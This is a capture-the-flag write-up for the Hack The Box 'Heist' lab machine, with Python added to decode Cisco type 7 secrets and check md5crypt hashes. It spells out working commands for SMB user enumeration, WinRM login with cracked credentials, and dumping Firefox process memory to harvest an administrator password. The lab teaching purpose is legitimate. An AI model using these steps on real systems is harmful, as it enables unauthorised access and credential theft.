Heist (Easy)

Enumeration

Nmap

nmap -sC -sV -oA nmap/10.10.10.149 10.10.10.149
Nmap scan report for 10.10.10.149
Host is up (0.11s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE       VERSION
80/tcp  open  http          Microsoft IIS httpd 10.0
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp open  msrpc         Microsoft Windows RPC
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-07-09T16:24:17
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jul  9 12:24:52 2021 -- 1 IP address (1 host up) scanned in 72.60 seconds
# Nmap 7.91 scan initiated Fri Jul  9 12:47:56 2021 as: nmap -vv --reason -Pn -A --osscan-guess --version-all -p- -oN /home/kali/Boxes/Hackthebox/Hiest/results/10.10.10.149/scans/_full_tcp_nmap.txt -oX /home/kali/Boxes/Hackthebox/Hiest/results/10.10.10.149/scans/xml/_full_tcp_nmap.xml 10.10.10.149
Nmap scan report for 10.10.10.149
Host is up, received user-set (0.090s latency).
Scanned at 2021-07-09 12:47:57 EDT for 350s
Not shown: 65530 filtered ports
Reason: 65530 no-responses
PORT      STATE SERVICE       REASON  VERSION
80/tcp    open  http          syn-ack Microsoft IIS httpd 10.0
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
445/tcp   open  microsoft-ds? syn-ack
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49669/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 0s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 20087/tcp): CLEAN (Timeout)
|   Check 2 (port 48515/tcp): CLEAN (Timeout)
|   Check 3 (port 25486/udp): CLEAN (Timeout)
|   Check 4 (port 40753/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-07-09T16:53:10
|_  start_date: N/A

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jul  9 12:53:47 2021 -- 1 IP address (1 host up) scanned in 350.69 seconds

As usual, I will check port 80 and port 445.

Port 80

We can see a page like this, and we are able to log in as guest.

When we click the attachment shown for user Hazard, we can see this:

Upon researching, we learn that the Cisco type 7 password is crackable.

We can use this website to crack it.

Meanwhile, for the type 5 password, we can use John the Ripper to crack it.
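To show why a type 7 string can be reversed on a website in an instant, here is an added example (not part of the original writeup, and not a tool the author used) that decodes Cisco IOS type 7 strings and audits a running-config for weakly stored secrets. The decoder relies on the fixed, long-public IOS type 7 key; the sample config is constructed, its usernames are placeholders, and the only real values in it are the two type 7 strings and the type 5 hash quoted in this writeup.

```python
import re

# The fixed 40-byte key that IOS XORs type 7 strings against. It is identical
# on every device and has been public for decades, so type 7 hides a secret
# only from a casual glance at the config.
_TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv"


def decode_type7(encoded: str) -> str:
    """Reverse a type 7 string: the first two decimal digits are the starting
    offset into the key, each following hex pair is plaintext XOR key byte."""
    if len(encoded) < 4 or len(encoded) % 2:
        raise ValueError("type 7 strings are an even number of hex digits, at least 4")
    seed = int(encoded[:2], 10)
    body = bytes.fromhex(encoded[2:])
    plain = bytes(b ^ _TYPE7_KEY[(seed + i) % len(_TYPE7_KEY)] for i, b in enumerate(body))
    return plain.decode("latin-1")


# Matches "... password <type> <value>" and "... secret <type> <value>" lines.
_SECRET_RE = re.compile(r"^[^\n]*?\b(?:password|secret)\s+(?P<type>\d)\s+(?P<val>\S+)", re.M)

_ADVICE = {
    "0": ("high", "stored in cleartext; re-enter the secret as type 8 or 9"),
    "5": ("medium", "md5crypt is cheap to brute-force offline; migrate to type 8 or 9"),
    "7": ("high", "reversible encoding, not encryption; migrate to type 8 or 9"),
    "8": ("info", "PBKDF2-SHA256, acceptable"),
    "9": ("info", "scrypt, acceptable"),
}


def audit_config(config: str) -> list[dict]:
    """Walk a running-config and report every stored secret with its storage type."""
    findings = []
    for m in _SECRET_RE.finditer(config):
        kind = m.group("type")
        severity, advice = _ADVICE.get(kind, ("high", "unrecognised storage type"))
        finding = {"line": m.group(0).strip(), "type": kind,
                   "severity": severity, "advice": advice}
        if kind == "7":
            # Demonstrate the weakness rather than just naming it.
            finding["plaintext"] = decode_type7(m.group("val"))
        findings.append(finding)
    return findings


# Constructed sample config: usernames are placeholders; the two type 7
# strings and the type 5 hash are the ones shown in the writeup above.
SAMPLE_CONFIG = """\
!
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username netadmin-placeholder privilege 15 password 7 02375012182C1A1D751618034F36415408
username support-placeholder password 7 0242114B0E143F015F5D1E161713
!
"""

if __name__ == "__main__":
    for f in audit_config(SAMPLE_CONFIG):
        print(f"[{f['severity']}] type {f['type']}: {f['line']}")
        if "plaintext" in f:
            print(f"        -> plaintext: {f['plaintext']}")
        print(f"        {f['advice']}")
```

Running it on the sample prints the two type 7 plaintexts from the table below and flags the enable secret as type 5, which is the practical argument for `enable algorithm-type scrypt secret ...` and type 8/9 `username` secrets on IOS: a config backup or TFTP share that leaks is then a cracking job rather than a free decode.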

Hash                                 Password
02375012182C1A1D751618034F36415408   Q4)sJu\Y8qz*A3?d
0242114B0E143F015F5D1E161713         $uperP@ssword
$1$pdQG$o8nrSzsGXeaduXrjlvKc91       stealth1agent
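The type 5 entry in the table is different in kind from the type 7 ones: it is md5crypt (salted, 1000 MD5 rounds), so there is nothing to decode and a tool like John can only confirm a guess by recomputing the whole thing. This added example (mine, not the author's, and not how John is implemented) is a from-scratch md5crypt so the table's type 5 hash can be verified against its plaintext; the short candidate list is constructed.

```python
import hashlib
import hmac
from typing import Iterable, Optional

# md5crypt's custom base64 alphabet (not the RFC 4648 one).
_ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value: int, count: int) -> str:
    """Emit `count` characters, least significant 6 bits first."""
    out = []
    for _ in range(count):
        out.append(_ITOA64[value & 0x3F])
        value >>= 6
    return "".join(out)


def md5crypt(password: bytes, salt: bytes, magic: bytes = b"$1$") -> str:
    """The classic FreeBSD/IOS type 5 construction: salted MD5 with a
    1000-iteration stretching loop and a byte-shuffled encoding."""
    ctx = hashlib.md5(password + magic + salt)
    alt = hashlib.md5(password + salt + password).digest()
    remaining = len(password)
    while remaining > 0:                      # mix in len(pw) bytes of alt
        ctx.update(alt[:min(16, remaining)])
        remaining -= 16
    bits = len(password)
    while bits:                               # one byte per bit of len(pw)
        ctx.update(b"\x00" if bits & 1 else password[:1])
        bits >>= 1
    final = ctx.digest()
    for r in range(1000):                     # the stretching loop
        c = hashlib.md5()
        c.update(password if r & 1 else final)
        if r % 3:
            c.update(salt)
        if r % 7:
            c.update(password)
        c.update(final if r & 1 else password)
        final = c.digest()
    triples = ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5))
    encoded = "".join(_to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
                      for a, b, c in triples)
    encoded += _to64(final[11], 2)
    return (magic + salt).decode("ascii") + "$" + encoded


def check_type5(stored: str, candidate: str) -> bool:
    """Recompute md5crypt with the stored salt and compare in constant time."""
    parts = stored.split("$")                 # ["", "1", salt, digest]
    if len(parts) != 4 or parts[1] != "1":
        raise ValueError("not a type 5 / md5crypt hash")
    salt = parts[2].encode("ascii")
    return hmac.compare_digest(md5crypt(candidate.encode("utf-8"), salt), stored)


def first_match(stored: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate that verifies, or None. Every miss costs the
    full 1000-round computation, which is the only thing slowing a wordlist run."""
    for cand in candidates:
        if check_type5(stored, cand):
            return cand
    return None


# The type 5 hash from the writeup's table, and a constructed candidate list.
TYPE5_HASH = "$1$pdQG$o8nrSzsGXeaduXrjlvKc91"
CANDIDATES = ["password", "letmein", "cisco123", "stealth1agent"]

if __name__ == "__main__":
    print(first_match(TYPE5_HASH, CANDIDATES))
```

The contrast with type 7 is the point: reversing type 7 needs no guess at all, whereas type 5 forces the attacker through a wordlist at 1000 MD5s per guess. That is still far too cheap on modern hardware, which is why the same audit should treat type 5 as a migration item and not as a safe default.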

After a lot of trial and error, I was finally able to log in to SMB with the correct pair of credentials.

smbclient --list //10.10.10.149/IPC$ -U hazard%stealth1agent

Then I use impacket-lookupsid to enumerate other possible users.

impacket-lookupsid hazard:stealth1agent@10.10.10.149

We can see that there are users Chase and Jason.

From the full TCP nmap scan, we know that port 5985 is WinRM, which lets us log in to the system.

User

We can use user Chase with the password Q4)sJu\Y8qz*A3?d:

evil-winrm -i 10.10.10.149 -u Chase -p "Q4)sJu\Y8qz*A3?d"

Got the user flag!

Privilege Escalation

After some enumeration, we can see that Mozilla Firefox is installed on the machine.

From the ps command, we can see that a few Firefox processes are running.

We can use ProcDump64 to dump the memory of one of those processes, then use strings to extract the readable text from the dump.

./procdump64.exe -accepteula -ma 6728

We can see that a dump has been created.

Now we can use strings.exe to write the readable strings to a file.

./strings.exe -accepteula firefox.exe_210802_163838.dmp > readable.txt

After that, we download the file containing the readable strings.

When I use Sublime Text to search for the password, it shows this:

Then we can log in as Administrator using the password shown.

Congratz!
